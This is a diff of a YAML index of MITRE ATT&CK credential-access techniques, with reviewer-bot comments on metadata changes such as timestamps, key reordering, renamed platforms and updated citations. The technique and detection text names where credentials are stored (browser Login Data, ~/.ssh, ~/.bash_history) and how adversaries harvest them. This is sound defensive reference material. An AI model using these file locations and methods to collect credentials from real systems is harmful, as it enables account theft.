- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
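Review bot: the whole block of `-` lines for T1555.003 (platforms, contributors, `id`/`type`/`created`, and the five external references) is re-added lower in the same object in the later hunks, so this is a key reorder; the one substantive change here is `modified` moving from `2022-05-11` to `2024-08-15`. Compare the `external_references` entries by `source_name` rather than by position: the URLs for Talos Olympic Destroyer, CryptUnprotectData, Proofpoint Vega, FireEye HawkEye and mimikittenz are unchanged, only their order differs.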
@@ -45488,6 +46214,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
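Review bot: the unchanged context at the end of this hunk shows the `x_mitre_detection` string with its path split across lines and a bare `. Monitor file read events of web browser files` line carrying no diff prefix; this looks like the inline-code span for `AppData\Local\Google\Chrome\User Data\Default\Login Data` being lost in rendering rather than a change in the patch, but confirm the committed YAML still holds the full path inside the single-quoted scalar, since a line break inside a quoted YAML string folds to a space and would silently alter the path a detection engineer copies from this field.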
@@ -45497,23 +46229,58 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests: []
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45550,23 +46317,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
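Review bot: this hunk is move-only; x_mitre_contributors, x_mitre_deprecated, x_mitre_domains and x_mitre_is_subtechnique are deleted below x_mitre_platforms and re-added above x_mitre_detection with identical values, so nothing changes for consumers of the index. If the sync tooling now emits keys in a different order, pin that order in the generator (and regenerate once) so later ATT&CK syncs produce value changes only and reviewers do not have to pair every removed line with its re-added twin.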
@@ -45599,21 +46366,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
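Review bot: the STIX-level `spec_version: '2.1'` is dropped here while x_mitre_attack_spec_version moves from 2.1.0 to 3.2.0, and the same deletion recurs for every object in this diff without a replacement line; confirm that nothing reading this index keys off spec_version, and say in the commit message that the field is intentionally removed rather than lost in the reorder. Repointing the lockstepgroup.com citation at a web.archive.org capture with a fresh retrieved date is the right call for a reference that has gone offline.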
@@ -45624,7 +46390,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45658,7 +46424,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -45686,7 +46452,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
- url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+ url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
- source_name: Microsoft Primary Refresh Token
description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
Retrieved February 21, 2023.
@@ -45697,14 +46463,13 @@ credential-access:
url: https://en.wikipedia.org/wiki/Public-key_cryptography
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.004
atomic_tests: []
T1557.001:
technique:
- modified: '2023-04-25T14:00:00.188Z'
+ modified: '2022-10-25T15:46:55.393Z'
name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
spoof an authoritative source for name resolution to force communication with
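Review bot: the `modified` timestamp for T1557.001 moves backwards, from 2023-04-25T14:00:00.188Z to 2022-10-25T15:46:55.393Z, whereas the other objects in this diff move forward. Several of the old values share the suffix 14:00:00.188Z (T1557.003 at the top of this diff, and later T1558.001, T1649, T1552.003 and T1556.008), which looks like a synthesised timestamp rather than one read from the STIX bundle, so the new earlier value is probably the genuine one; note that in the commit message so the regression is not mistaken for a stale source snapshot.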
@@ -45812,12 +46577,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1557.001
atomic_tests: []
T1003.001:
technique:
- modified: '2023-12-27T17:57:20.003Z'
+ modified: '2024-08-13T13:52:45.379Z'
name: 'OS Credential Dumping: LSASS Memory'
description: |
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45854,6 +46618,7 @@ credential-access:
- Edward Millington
- Ed Williams, Trustwave, SpiderLabs
- Olaf Hartong, Falcon Force
+ - Michael Forret, Quorum Cyber
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45866,7 +46631,7 @@ credential-access:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Access'
- 'Windows Registry: Windows Registry Key Modification'
@@ -45916,12 +46681,11 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.001
atomic_tests: []
T1110.003:
technique:
- modified: '2024-03-07T14:33:34.201Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Spraying'
description: |-
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -45947,6 +46711,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- John Strand
@@ -45962,18 +46727,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
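Review bot: x_mitre_platforms for T1110.003 drops Azure AD, Office 365 and Google Workspace and gains Office Suite and Identity Provider, with the version bumped from 1.5 to 1.6. Anything that filters this index by the old platform strings will no longer match password spraying, so the per-platform index generation needs to know the new names; also consider keeping the platform list sorted rather than appending the new entries after Network, which is what produces the interleaved +/- lines here.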
@@ -46000,9 +46765,6 @@ credential-access:
url: https://www.us-cert.gov/ncas/alerts/TA18-086A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1110.003
atomic_tests:
- name: AWS - Password Spray an AWS using GoAWSConsoleSpray
@@ -46042,7 +46804,7 @@ credential-access:
elevation_required: false
T1056.003:
technique:
- modified: '2023-03-30T21:01:46.711Z'
+ modified: '2024-10-15T16:43:43.849Z'
name: Web Portal Capture
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -46053,13 +46815,13 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: File monitoring may be used to detect changes to files in
the Web directory for organization login pages that do not match with authorized
updates to the Web server's content.
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
@@ -46073,6 +46835,7 @@ credential-access:
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
created: '2020-02-11T18:59:50.058Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1056/003
@@ -46083,12 +46846,12 @@ credential-access:
url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1003.005:
technique:
- modified: '2024-04-18T23:47:54.553Z'
+ modified: '2024-10-15T14:18:59.123Z'
name: 'OS Credential Dumping: Cached Domain Credentials'
description: "Adversaries may attempt to access cached domain credentials used
to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46163,7 +46926,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.005
atomic_tests: []
T1558.001:
@@ -46209,7 +46971,7 @@ credential-access:
url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
Retrieved February 27, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-05T16:07:03.779Z'
name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
description: "Adversaries who have the KRBTGT account password hash may forge
Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46244,16 +47006,14 @@ credential-access:
- 'Logon Session: Logon Session Metadata'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1558.001
atomic_tests: []
T1649:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal or Forge Authentication Certificates
description: |-
- Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+ Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
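Review bot: T1558.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk with no replacement visible, unlike every other object in the diff, which ends up with x_mitre_attack_spec_version: 3.2.0; confirm the field is re-emitted elsewhere in that object, or the Golden Ticket entry is the only one left without a spec version. The same object also keeps `x_mitre_permissions_required: - User` while that field is removed from T1552.003 and T1552.006 further down, so decide whether the deprecated field is in or out and apply it uniformly. Changing "Azure AD" to "Entra ID" in the T1649 description while the citation key stays `O365 Blog Azure AD Device IDs` is fine, since the key is an identifier, not display text.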
@@ -46263,21 +47023,23 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Tristan Bennett, Seamless Intelligence
+ - Lee Christensen, SpecterOps
+ - Thirumalai Natarajan, Mandiant
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- - Azure AD
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Tristan Bennett, Seamless Intelligence
- - Lee Christensen, SpecterOps
- - Thirumalai Natarajan, Mandiant
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -46326,33 +47088,11 @@ credential-access:
url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1649
atomic_tests: []
T1552.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
- type: attack-pattern
- created: '2020-02-04T13:02:11.685Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.003
- url: https://attack.mitre.org/techniques/T1552/003
- - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- source_name: External to DA, the OS X Way
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-12T15:24:04.912Z'
name: 'Unsecured Credentials: Bash History'
description: 'Adversaries may search the bash command history on compromised
systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46367,25 +47107,43 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Monitoring when the user's .bash_history
is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history
.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+ created: '2020-02-04T13:02:11.685Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1552/003
+ external_id: T1552.003
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1552.003
atomic_tests: []
T1552.001:
technique:
- modified: '2024-04-15T21:33:00.213Z'
+ modified: '2024-10-15T14:28:43.639Z'
name: 'Unsecured Credentials: Credentials In Files'
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
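Review bot: two real changes are buried inside the move-only reorder of T1552.003 and deserve their own mention in the commit message: `x_mitre_permissions_required: - User` is dropped, and the External to DA citation now points at https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418 (a different path from the old StephanBorosh URL) with the retrieved date moved to September 12, 2024. A reviewer comparing the removed block in the previous hunk with the re-added one here has to pair lines by hand to spot either; where a reference URL changes, an archive capture, as used for the other replaced links in this diff, would also keep the citation stable.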
@@ -46459,7 +47217,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.001
atomic_tests: []
T1606.001:
@@ -46521,11 +47278,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1528:
technique:
- modified: '2024-03-24T19:41:54.832Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Steal Application Access Token
description: "Adversaries can steal application access tokens as a means of
acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46574,6 +47330,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Suzy Schapperle - Microsoft Azure Red Team
- Shailesh Tiwary (Indian Army)
@@ -46582,6 +47339,7 @@ credential-access:
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Ram Pliskin, Microsoft Azure Security Center
- Jack Burns, HubSpot
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46592,13 +47350,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- - Office 365
- - Azure AD
- - Google Workspace
- Containers
- x_mitre_version: '1.3'
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
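Review bot: IaaS is newly added to x_mitre_platforms for T1528, which is a scope expansion rather than part of the Azure AD / Office 365 / Google Workspace to Identity Provider / Office Suite rename that the surrounding hunks apply; it justifies the 1.3 to 1.4 bump, but make sure the IaaS-scoped output of this index now carries Steal Application Access Token, and call the addition out in the commit message instead of folding it in with the renames.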
@@ -46654,44 +47413,11 @@ credential-access:
url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1528
atomic_tests: []
T1552.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
- type: attack-pattern
- created: '2020-02-11T18:43:06.253Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1552.006
- url: https://attack.mitre.org/techniques/T1552/006
- - source_name: Microsoft GPP 2016
- url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
- description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
- March 9, 2020.
- - url: https://msdn.microsoft.com/library/cc422924.aspx
- description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
- 11, 2018.
- source_name: Microsoft GPP Key
- - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
- description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
- Retrieved April 11, 2018.
- source_name: Obscuresecurity Get-GPPPassword
- - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
- & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
- url: https://adsecurity.org/?p=2288
- source_name: ADSecurity Finding Passwords in SYSVOL
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-08-15T13:21:22.734Z'
name: 'Unsecured Credentials: Group Policy Preferences'
description: |
